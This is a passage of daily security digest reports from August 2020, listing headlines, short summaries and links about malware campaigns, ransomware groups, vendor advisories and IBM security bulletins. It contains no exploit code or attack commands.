https://www.microsoft.com/security/blog/2020/08/27/stopping-active-director…
∗∗∗ Exploring the Ubiquiti UniFi Cloud Key Gen2 Plus ∗∗∗
---------------------------------------------
Scoping attack surface, setting up debugging for UniFi Protect and UniFi Management Portal APIs, and finding unauthenticated API vulnerabilities
---------------------------------------------
https://medium.com/tenable-techblog/exploring-the-ubiquiti-unifi-cloud-key-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Multiple NETGEAR switching hubs vulnerable to cross-site request forgery ∗∗∗
---------------------------------------------
GS716Tv2 and GS724Tv3 provided by NETGEAR contain a cross-site request forgery vulnerability.
---------------------------------------------
https://jvn.jp/en/jp/JVN29903998/
∗∗∗ Cisco NX-OS Software Call Home Command Injection Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in the Call Home feature of Cisco NX-OS Software could allow an authenticated, remote attacker to inject arbitrary commands that could be executed with root privileges on the underlying operating system (OS). The vulnerability is due to insufficient input validation of specific Call Home configuration parameters when the software is configured for transport method HTTP.
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ [webapps] Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated) ∗∗∗
---------------------------------------------
https://www.exploit-db.com/exploits/48770
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Guardium ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: IBM Resilient users may experience a denial of service of the SOAR Platform due to insufficient input validation (CVE-2019-4579) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-users-may-e…
∗∗∗ Security Bulletin: Information Disclosure vulnerability in IBM Spectrum Protect Server (CVE-2020-4591) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-vu…
∗∗∗ Security Bulletin: CVE-2020-2654 may affect IBM® SDK, Java™ Technology Edition for Content Collector for SAP Applications ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2654-may-affect-…
∗∗∗ Security Bulletin: IBM Resilient users may experience a denial of service of the SOAR Platform due to insufficient input validation (CVE-2019-4533) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-users-may-e…
∗∗∗ Security Bulletin: Information disclosure vulnerability in WebSphere Application Server – Liberty affects IBM MobileFirst Platform Foundation ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-vu…
∗∗∗ Security Bulletin: Vulnerability exposure (deferred from Oracle Jan 2020 Java CPU) in IBM Java SDK affects IBM Operations Analytics Predictive Insights ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-exposure-de…
∗∗∗ Security Bulletin: IBM SDK, Java Technology Edition Quarterly CPU – Jul 2020 – Includes Oracle Jul 2020 CPU plus one additional vulnerability affects Content Collector for SAP Applications ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-sdk-java-technology-e…
∗∗∗ Security Bulletin: Denial of Service vulnerability in IBM Spectrum Protect Server (CVE-2020-4559) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-denial-of-service-vulnera…
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 26-08-2020 18:00 − Thursday 27-08-2020 18:00
Handler: Stephan Richter
Co-Handler: Thomas Pribitzer
=====================
= News =
=====================
∗∗∗ Revamped Qbot Trojan Packs New Punch: Hijacks Email Threads ∗∗∗
---------------------------------------------
New version of trojan is spreading fast and already has claimed 100,000 victims globally, Check Point has discovered.
---------------------------------------------
https://threatpost.com/revamped-qbot-trojan-packs-new-punch-hijacks-email-t…
∗∗∗ Security.txt - one small file for an admin, one giant help to a security researcher, (Thu, Aug 27th) ∗∗∗
---------------------------------------------
The draft standard "A File Format to Aid in Security Vulnerability Disclosure" covers the creation of a file called "security.txt" in the /.well-known/ path on a web server, or in its root, which contains information relevant to the security of the server.
---------------------------------------------
https://isc.sans.edu/diary/rss/26510
∗∗∗ Cybercrime: Trickbot now also threatens to publish data ∗∗∗
---------------------------------------------
The Trickbot gang, which is linked to Emotet, is deploying new ransomware and now also operates its own leak platform.
---------------------------------------------
https://heise.de/-4879948
∗∗∗ Mysterious pop-up messages unsettle Android users ∗∗∗
---------------------------------------------
"Test": that is the terse content of push notifications that are currently appearing on a large scale on Android phones.
---------------------------------------------
https://heise.de/-4880604
∗∗∗ Microsoft Warns of New Anubis Info-Stealer Distributed in the Wild ∗∗∗
---------------------------------------------
Microsoft warned on Thursday that a recently uncovered piece of malware designed to help cybercriminals steal information from infected systems is now actively distributed in the wild.
---------------------------------------------
https://www.securityweek.com/microsoft-warns-new-anubis-info-stealer-distri…
∗∗∗ Cetus: Cryptojacking Worm Targeting Docker Daemons ∗∗∗
---------------------------------------------
Cetus is a new and improved Docker cryptojacking worm mining for Monero, discovered in a Docker daemon honeypot.
---------------------------------------------
https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/
=====================
= Vulnerabilities =
=====================
∗∗∗ Foxit Studio Photo for Windows: New version fixes vulnerabilities ∗∗∗
---------------------------------------------
Version 3.6.6.928 of the image editing software Foxit Studio Photo closes two vulnerabilities whose exploitation would have required user interaction.
---------------------------------------------
https://heise.de/-4879609
∗∗∗ Attackers could knock out F5 BIG-IP Application Security Manager ∗∗∗
---------------------------------------------
F5 has released important security updates for various BIG-IP appliances.
---------------------------------------------
https://heise.de/-4880348
∗∗∗ Security updates: Cisco hardens NX-OS network software against DoS attacks ∗∗∗
---------------------------------------------
Due to several security vulnerabilities, attackers could attack various Cisco switch models.
---------------------------------------------
https://heise.de/-4880654
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (firefox-esr and nginx), Fedora (firefox, firejail, and lua), Gentoo (chromium, docker, firefox and thunderbird, net-snmp, postgresql, and wireshark), openSUSE (chromium, claws-mail, dovecot23, libreoffice, and python3), Oracle (kernel), Scientific Linux (firefox), SUSE (apache2, graphviz, and libxslt), and Ubuntu (firefox, libmysofa, and squid3).
---------------------------------------------
https://lwn.net/Articles/829690/
∗∗∗ Vulnerabilities Expose Popular DVB-T2 Set-Top Boxes to Botnets: Researchers ∗∗∗
---------------------------------------------
Avast security researchers have identified vulnerabilities in DVB-T2 devices that could allow attackers to ensnare them in botnets.
---------------------------------------------
https://www.securityweek.com/vulnerabilities-expose-popular-dvb-t2-set-top-…
∗∗∗ Mozilla Thunderbird: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.bsi-fuer-buerger.de/SharedDocs/Warnmeldungen/DE/TW/2020/08/warn…
∗∗∗ Security Bulletin: Vulnerability in Netty 4.1.x before 4.1.46 affects IBM Operations Analytics Predictive Insights (CVE-2020-11612) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-netty-4-…
∗∗∗ Security Bulletin: CVE-2020-2654 in IBM® Runtime Environment Java™ affects TXSeries for Multiplatforms ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2654-in-ibm-runt…
∗∗∗ Security Bulletin: IBM Security Guardium Insights is affected by IBM SDK, Java Technology Edition Quarterly CPU – Apr 2020 vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-ins…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect ITCAM for SOA ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: WebSphere Application Server ND is vulnerable to cross-site scripting (CVE-2020-4575) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser…
∗∗∗ Security Bulletin: IBM Security Guardium Insights is affected by multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-ins…
∗∗∗ Security Bulletin: Openstack Keystone vulnerabilities affects IBM Spectrum Scale (CVE-2020-12689) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-openstack-keystone-vulner…
∗∗∗ Security Bulletin: A vulnerability in IBM® Java™ Runtime Environment affects IBM CICS TX on Cloud ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 25-08-2020 18:00 − Wednesday 26-08-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ New SunCrypt Ransomware sheds light on Maze's ransomware cartel ∗∗∗
---------------------------------------------
A new ransomware named SunCrypt has joined the Maze cartel, and with their membership, we get insight into how these groups are working together.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-suncrypt-ransomware-shed…
∗∗∗ Reverse Engineering and observing an IoT botnet ∗∗∗
---------------------------------------------
IoT devices are everywhere around us, and some of them are not up to date with today's security standards. A single light bulb exposed to the internet can offer an attacker a variety of possibilities to attack companies or households. The possibilities are endless.
---------------------------------------------
https://www.gdatasoftware.com/blog/2020/08/36243-reverse-engineering-and-ob…
∗∗∗ [SANS ISC] Malicious Excel Sheet with a NULL VT Score ∗∗∗
---------------------------------------------
I published the following diary on isc.sans.edu: "Malicious Excel Sheet with a NULL VT Score": Just a quick diary today to demonstrate, once again, that relying only on a classic antivirus solution is not sufficient in 2020. I found a sample that just has a very nice score of 0/57 on VT.
---------------------------------------------
https://blog.rootshell.be/2020/08/26/sans-isc-malicious-excel-sheet-with-a-…
∗∗∗ Emulation of Malicious Shellcode With Speakeasy ∗∗∗
---------------------------------------------
In order to enable emulation of malware samples at scale, we have developed the Speakeasy emulation framework. Speakeasy aims to make it as easy as possible for users who are not malware analysts to acquire triage reports in an automated way, as well as enabling reverse engineers to write custom plugins to triage difficult malware families.
---------------------------------------------
http://www.fireeye.com/blog/threat-research/2020/08/emulation-of-malicious-…
∗∗∗ Most organizations have no Active Directory cyber disaster recovery plan ∗∗∗
---------------------------------------------
Although 97% of organizations said that Active Directory (AD) is mission-critical, more than half never actually tested their AD cyber disaster recovery process or do not have a plan in place at all, a Semperis survey of over 350 identity-centric security leaders reveals. "The expanded work-from-home environment makes organizational identity a priority and also increases the attack surface relative to Active Directory," said Charles Kolodgy, Principal at Security Mindsets.
---------------------------------------------
https://www.helpnetsecurity.com/2020/08/26/active-directory-cyber-disaster-…
∗∗∗ Beware when buying a car privately: the freight forwarder alo-car.com is fake! ∗∗∗
---------------------------------------------
When looking for cheap used cars, motorhomes or motorcycles, classified-ad platforms are often the best option. But be careful if the other party claims to be abroad and wants to handle the purchase through a freight forwarder. In many cases these are fictitious forwarders and criminals who only want your money.
---------------------------------------------
https://www.watchlist-internet.at/news/vorsicht-beim-privaten-autokauf-sped…
∗∗∗ Conti (Ryuk) joins the ranks of ransomware gangs operating data leak sites ∗∗∗
---------------------------------------------
More and more ransomware gangs are now operating sites where they leak sensitive data from victims who refuse to pay the ransom demand.
---------------------------------------------
https://www.zdnet.com/article/conti-ryuk-joins-the-ranks-of-ransomware-gang…
∗∗∗ Mercenaries launch APT attacks ∗∗∗
---------------------------------------------
According to findings by Bitdefender, a hacker group that hires itself out as mercenaries to various clients has used advanced persistent threat (APT) cyber-espionage attacks with zero-day attacks on Autodesk 3ds Max to steal intellectual property.
---------------------------------------------
https://www.zdnet.de/88382317/soeldner-starten-apt-attacken/
=====================
= Vulnerabilities =
=====================
∗∗∗ Magento Multiversion (1.x/2.x) Backdoor ∗∗∗
---------------------------------------------
The Magento 1 EOL date has already passed, however it’s evident that a large number of websites will continue to use it for the foreseeable future. Unfortunately, attackers are also aware that many websites are straggling with their Magento migrations and post compromise tools have been created to support deployment for both Magento 1.x and 2.x versions, making it easier for them to exploit a larger number of sites.
---------------------------------------------
https://blog.sucuri.net/2020/08/magento-multiversion-1-x-2-x-backdoor.html
∗∗∗ Extensive file permissions on service executable in Eikon Thomson Reuters (CVE-2019-10679) ∗∗∗
---------------------------------------------
SEC Consult found a vulnerability that allows unprivileged users to escalate their privileges to SYSTEM in Eikon of Thomson Reuters. This is possible due to extensive file permissions that allow standard users to modify executable files.
---------------------------------------------
https://sec-consult.com/en/blog/advisories/extensive-file-permissions-on-se…
∗∗∗ Huawei Security Advisories ∗∗∗
---------------------------------------------
Huawei has published 20 new or updated Security Advisories.
---------------------------------------------
https://www.huawei.com/en/psirt/all-bulletins
∗∗∗ WordPress: Security vulnerabilities in the Autoptimize plugin, installed millions of times ∗∗∗
---------------------------------------------
Users of the Autoptimize plugin should promptly update it to 2.7.7. Proof-of-concept code is said to be published soon for one of the two closed vulnerabilities.
---------------------------------------------
https://heise.de/-4879463
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (firefox-esr, ghostscript, php7.0, and proftpd-dfsg), Fedora (mod_http2 and thunderbird), Red Hat (chromium-browser and firefox), and SUSE (apache2, grub2, samba, and xorg-x11-server).
---------------------------------------------
https://lwn.net/Articles/829609/
∗∗∗ F5 BIG-IP: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-0843
∗∗∗ Security Bulletin: August 2020: CVE-2020-2654 in IBM Java Runtime affects CICS Transaction Gateway ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-august-2020-cve-2020-2654…
∗∗∗ Security Bulletin: Kerberos vulnerability in IBM Java Runtime affects Collaboration and Deployment Services ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-kerberos-vulnerability-in…
∗∗∗ Security Bulletin: BEAST security vulnerability in IBM Tivoli Netcool Performance Manager for Wireline (CVE-2011-3389) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-beast-security-vulnerabil…
∗∗∗ Security Bulletin: Vulnerability in Apache Batik affects WebSphere Application Server (CVE-2019-17566) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-b…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 24-08-2020 18:00 − Tuesday 25-08-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ iOS & macOS: Apple will only close security vulnerability after a year ∗∗∗
---------------------------------------------
A vulnerability in the Safari browser allows local files to be shared unintentionally. Apple will not close the now-published vulnerability until spring 2021.
---------------------------------------------
https://www.golem.de/news/ios-macos-apple-will-sicherheitsluecke-erst-nach-…
∗∗∗ Patch Management Policy: A Practical Guide ∗∗∗
---------------------------------------------
Patching – this highly necessary, yet sometimes neglected practice of resolving security issues related to vulnerabilities – can be a burden for organizations of all sizes. You probably already know that a regular and well-defined patch management routine proactively ensures your systems function as they are supposed to. However, it can seem like an overwhelming [...]
---------------------------------------------
https://heimdalsecurity.com/blog/patch-management-policy/
∗∗∗ RATs and Spam: The Node.JS QRAT ∗∗∗
---------------------------------------------
The Qua or Quaverse Remote Access Trojan (QRAT) is a Java-based RAT that can be used to gain complete control over a system.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rats-and-sp…
∗∗∗ [SANS ISC] Keep An Eye on LOLBins ∗∗∗
---------------------------------------------
I published the following diary on isc.sans.edu: “Keep An Eye on LOLBins“: Don’t misread, I won’t talk about “lolcats” today but “LOLBins” or “Living Off The Land Binaries”. All operating systems provide a rich toolbox to achieve multiple day-to-day tasks like maintenance of the certificates, installation of patches and applications, [...]
---------------------------------------------
https://blog.rootshell.be/2020/08/25/sans-isc-keep-an-eye-on-lolbins/
∗∗∗ Security researchers fear infiltrated App Store applications ∗∗∗
---------------------------------------------
The XCSSET malware reaches the Mac via Xcode projects. This could have implications for Apple's security concept.
---------------------------------------------
https://heise.de/-4877855
∗∗∗ Looking for an apartment? Then beware of fake listings! ∗∗∗
---------------------------------------------
You have finally found your dream apartment at an unbelievably low price? There is one catch, though: the landlord is currently abroad and wants you to pay the deposit before the viewing? Then you have come across a fraudulent apartment listing! In reality this apartment does not exist; criminals are using a tempting offer to get at your money and copies of your ID!
---------------------------------------------
https://www.watchlist-internet.at/news/gerade-auf-wohnungssuche-dann-sollte…
∗∗∗ Browser-based cryptojacking sees sudden spike in activity in Q2 2020 ∗∗∗
---------------------------------------------
However, there's nothing to worry about. Browser-based cryptojacking is not making a comeback.
---------------------------------------------
https://www.zdnet.com/article/browser-based-cryptojacking-sees-sudden-spike…
=====================
= Vulnerabilities =
=====================
∗∗∗ WordPress: Important security updates available for several plugins ∗∗∗
---------------------------------------------
Updates for "Advanced Access Manager", "Discount Rules for WooCommerce" and "Quiz and Survey Master" close vulnerabilities rated high to critical.
---------------------------------------------
https://heise.de/-4878220
∗∗∗ [20200802] - Core - Open redirect in com_content vote feature ∗∗∗
---------------------------------------------
Project: Joomla!
SubProject: CMS
Impact: Low
Severity: Low
Versions: 3.0.0-3.9.20
Exploit type: Open Redirect
Reported Date: 2020-July-05
Fixed Date: 2020-August-25
CVE Number: CVE-2020-24598
Description: Lack of input validation in com_content leads to an open redirect.
Affected Installs: Joomla! CMS versions 3.0.0 - 3.9.20
Solution: Upgrade to version 3.9.21
Contact: The JSST at the Joomla! Security Centre.
Reported By: Ahmad Kamaran Jamil
---------------------------------------------
https://developer.joomla.org:443/security-centre/825-20200802-core-open-red…
∗∗∗ [20200803] - Core - Directory traversal in com_media ∗∗∗
---------------------------------------------
Project: Joomla!
SubProject: CMS
Impact: Low
Severity: Low
Versions: 2.5.0-3.9.20
Exploit type: Directory Traversal
Reported Date: 2020-February-02
Fixed Date: 2020-August-25
CVE Number: CVE-2020-24597
Description: Lack of input validation allows com_media root paths outside of the webroot.
Affected Installs: Joomla! CMS versions 2.5.0 - 3.9.20
Solution: Upgrade to version 3.9.21
Contact: The JSST at the Joomla! Security Centre.
Reported By: Hoang Kien from VSEC
---------------------------------------------
https://developer.joomla.org:443/security-centre/827-20200803-core-director…
∗∗∗ [20200801] - Core - XSS in mod_latestactions ∗∗∗
---------------------------------------------
Project: Joomla!
SubProject: CMS
Impact: Moderate
Severity: Low
Versions: 3.9.0-3.9.20
Exploit type: XSS
Reported Date: 2020-August-21
Fixed Date: 2020-August-25
CVE Number: CVE-2020-24599
Description: Lack of escaping in mod_latestactions allows XSS attacks.
Affected Installs: Joomla! CMS versions 3.9.0 - 3.9.20
Solution: Upgrade to version 3.9.21
Contact: The JSST at the Joomla! Security Centre.
Reported By: Peter Martin
---------------------------------------------
https://developer.joomla.org:443/security-centre/824-20200801-core-xss-in-m…
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (icingaweb2 and mongodb), Fedora (nss), Gentoo (chromium and shadow), Mageia (ghostscript, kdepim-runtime, kmail-account-wizard, luajit, mysql-connector-python, and python-ipaddress), openSUSE (python, python3, and webkit2gtk3), Red Hat (kernel and kernel-alt), Slackware (firefox), SUSE (squid3), and Ubuntu (bind9, ghostscript, net-snmp, postgresql-10, postgresql-12, postgresql-9.5, and sane-backends).
---------------------------------------------
https://lwn.net/Articles/829548/
∗∗∗ Microsoft Patches Code Execution, Privilege Escalation Flaws in Azure Sphere ∗∗∗
---------------------------------------------
Recently addressed Microsoft Azure Sphere vulnerabilities could lead to the execution of arbitrary code or to elevation of privileges, Cisco Talos’ researchers warn.
---------------------------------------------
https://www.securityweek.com/microsoft-patches-code-execution-privilege-esc…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by a Missing Security Control vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: Publicly disclosed vulnerabilities from Kernel affect IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Security Bulletin: Multiple Vulnerabilities in IBM Guardium Data Encryption (GDE) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: IBM Elastic Storage System 3000 is affected by weak crypto algorithm (CVE-2020-4349) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-syste…
∗∗∗ Security Bulletin: CVE-2020-2654 may affect IBM® SDK, Java™ Technology Edition for Content Collector for SAP Applications ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2654-may-affect-…
∗∗∗ Security Bulletin: IBM Elastic Storage Server GUI is affected by cross-site scripting (CVE-2020-4358) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-serve…
∗∗∗ Security Bulletin: IBM Elastic Storage System 3000 is affected by cross-site scripting (CVE-2020-4358) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-syste…
∗∗∗ Security Bulletin: WebSphere Application Server is vulnerable to information disclosure, which affects IBM CICS TX on Cloud ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser…
∗∗∗ Security Bulletin: IBM Elastic Storage System 3000 GUI is affected by verbose error message (CVE-2020-4357) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-syste…
∗∗∗ Security Bulletin: IBM Elastic Storage System 3000 GUI is affected by weak crypto algorithm (CVE-2020-4379) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-syste…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 21-08-2020 18:00 − Monday 24-08-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Ransomware attacks VPN and RDP ∗∗∗
---------------------------------------------
Ransomware is becoming ever more dangerous. Hackers primarily use the Remote Desktop Protocol (RDP) and virtual private networks (VPN) as entry points. Email phishing, by contrast, is losing importance.
---------------------------------------------
https://www.zdnet.de/88382240/ransomware-attackiert-vpn-und-rdp/
∗∗∗ DarkSide: New targeted ransomware demands million dollar ransoms ∗∗∗
---------------------------------------------
A new ransomware operation named DarkSide began attacking organizations earlier this month with customized attacks that have already earned them million-dollar payouts.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/darkside-new-targeted-ransom…
∗∗∗ Lifting the veil on DeathStalker, a mercenary triumvirate ∗∗∗
---------------------------------------------
DeathStalker is a unique threat group that appears to target law firms and companies in the financial sector. They don’t deploy ransomware or steal payment information to resell it, their interest in gathering sensitive business information [...]
---------------------------------------------
https://securelist.com/deathstalker-mercenary-triumvirate/98177/
∗∗∗ Hunting for Risky Rules in Office 365 ∗∗∗
---------------------------------------------
When an attacker compromises an Office 365 mailbox, one of the most common activities that we see is new inbox rules being created - therefore finding these rules is a good way to identify compromised accounts and mailboxes.
---------------------------------------------
https://blog.rothe.uk/risky-rules-in-office365/
∗∗∗ Bypassing MassLogger Anti-Analysis — a Man-in-the-Middle Approach ∗∗∗
---------------------------------------------
The FireEye Front Line Applied Research & Expertise (FLARE) Team attempts to always stay on top of the most current and emerging threats. As a member of the FLARE Reverse Engineer team, I recently received a request to analyze a fairly new credential stealer identified as MassLogger. Despite the lack of novel functionalities and features, this sample employs a sophisticated technique that replaces the Microsoft Intermediate Language (MSIL) at run time to hinder static analysis.
---------------------------------------------
https://www.fireeye.com/blog/threat-research/2020/08/bypassing-masslogger-a…
∗∗∗ Protect your organization in the age of Magecart ∗∗∗
---------------------------------------------
The continuing wave of attacks by cybercriminal groups known under the umbrella term Magecart perfectly illustrates just how unprepared many e-commerce operations are from a security point of view. It all really boils down to timing. If the e-commerce world was able to detect such Magecart attacks in a matter of seconds (rather than weeks or months), then we could see an end to Magecart stealing all of the cybercrime headlines.
---------------------------------------------
https://www.helpnetsecurity.com/2020/08/24/protect-your-organization-in-the…
=====================
= Vulnerabilities =
=====================
∗∗∗ WordPress WooCommerce stores under attack, patch now ∗∗∗
---------------------------------------------
Hackers are actively targeting and trying to exploit SQL injection, authorization issues, and unauthenticated stored cross-site scripting (XSS) security vulnerabilities in the Discount Rules for WooCommerce WordPress plugin with more than 30,000 installations.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/wordpress-woocommerce-stores…
∗∗∗ Xen Security Advisory CVE-2020-14364 / XSA-335 ∗∗∗
---------------------------------------------
An out-of-bounds read/write access issue was found in the USB emulator of QEMU. It occurs while processing USB packets from a guest, when USBDevice->setup_len exceeds the size of USBDevice->data_buf[4096], in the do_token_{in,out} routines.
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-335.html
∗∗∗ Security update: VMware App Volumes hardened ∗∗∗
---------------------------------------------
Attackers could attack VMware's application management software App Volumes.
---------------------------------------------
https://heise.de/-4876962
∗∗∗ VMSA-2020-0018 ∗∗∗
---------------------------------------------
VMware ESXi, vCenter Server, and Cloud Foundation updates address a partial denial of service vulnerability (CVE-2020-3976).
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2020-0018.html
∗∗∗ Vulnerability Spotlight: Use-after-free vulnerability in Google Chrome WebGL could lead to code execution ∗∗∗
---------------------------------------------
The Google Chrome web browser contains a use-after-free vulnerability in its WebGL component that could allow a user to execute arbitrary code in the context of the browser process.
---------------------------------------------
https://blog.talosintelligence.com/2020/08/vuln-spotlight-chrome-use-free-a…
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (firejail, icingaweb2, inetutils, libjackson-json-java, proftpd-dfsg, python2.7, software-properties, and sqlite3), Fedora (chrony), Mageia (chrony), openSUSE (dovecot23, postgresql12, and python), Slackware (bind), SUSE (gettext-runtime and SUSE Manager Server 3.2), and Ubuntu (bind9).
---------------------------------------------
https://lwn.net/Articles/829486/
∗∗∗ Synology-SA-20:19 ISC BIND ∗∗∗
---------------------------------------------
CVE-2020-8622 allows remote authenticated users to conduct denial-of-service attacks via a susceptible version of DNS Server. None of Synology's products are affected by CVE-2020-8620, CVE-2020-8621, CVE-2020-8623, or CVE-2020-8624, as these vulnerabilities only affect ISC BIND 9.9.12 and later.
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_20_19
∗∗∗ Citrix Hypervisor Security Update ∗∗∗
---------------------------------------------
Two issues have been identified in Citrix Hypervisor that may, in certain configurations, allow privileged code in an HVM guest VM to execute code in the control domain, potentially compromising the host.
---------------------------------------------
https://support.citrix.com/article/CTX280451
∗∗∗ Squid: Multiple vulnerabilities ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0838
∗∗∗ Security Bulletin: IBM SDK, Java Technology Edition Quarterly CPU – Jan 2020 – CVE-2020-2601 affects IBM Tivoli Composite Application Manager for Transactions-Robotic Response Time ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-sdk-java-technology-e…
∗∗∗ Security Bulletin: IBM SDK, Java Technology Edition Quarterly CPU – Jan 2020 – Includes Oracle Jan 2020 CPU affects IBM Tivoli Composite Application Manager for Transactions-Robotic Response Time ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-sdk-java-technology-e…
∗∗∗ Security Bulletin: A vulnerability has been identified in IBM Elastic Storage Server where an attacker can cause a denial of service (CVE-2020-4383) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-has-been-…
∗∗∗ Security Bulletin: Multiple Vulnerabilities in IBM Java Runtime Affect IBM Sterling Connect:Direct for UNIX ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Kernel affects IBM Netezza Host Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner…
∗∗∗ Security Bulletin: IBM Security Guardium Insights is affected by a ClickJacking vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-ins…
∗∗∗ Security Bulletin: IBM Security Guardium Insights is affected by components with known vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-ins…
∗∗∗ Security Bulletin: Multiple Vulnerabilities in IBM Java Runtime Affect IBM Sterling Connect:Direct for UNIX ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: IBM Security Guardium Insights is affected by components with known vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-ins…
∗∗∗ Security Bulletin: IBM Security Guardium Insights is affected by an Open Redirect vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-ins…
∗∗∗ Security Bulletin: Vulnerability in Bash affects IBM Spectrum Protect Plus (CVE-2019-9924) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-bash-aff…
∗∗∗ Security Bulletin: IBM Cloud Private is vulnerable to multiple node.js vulnerabilities (CVE-2020-11080, CVE-2020-10531, CVE-2020-8172, CVE-2020-8174) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vuln…
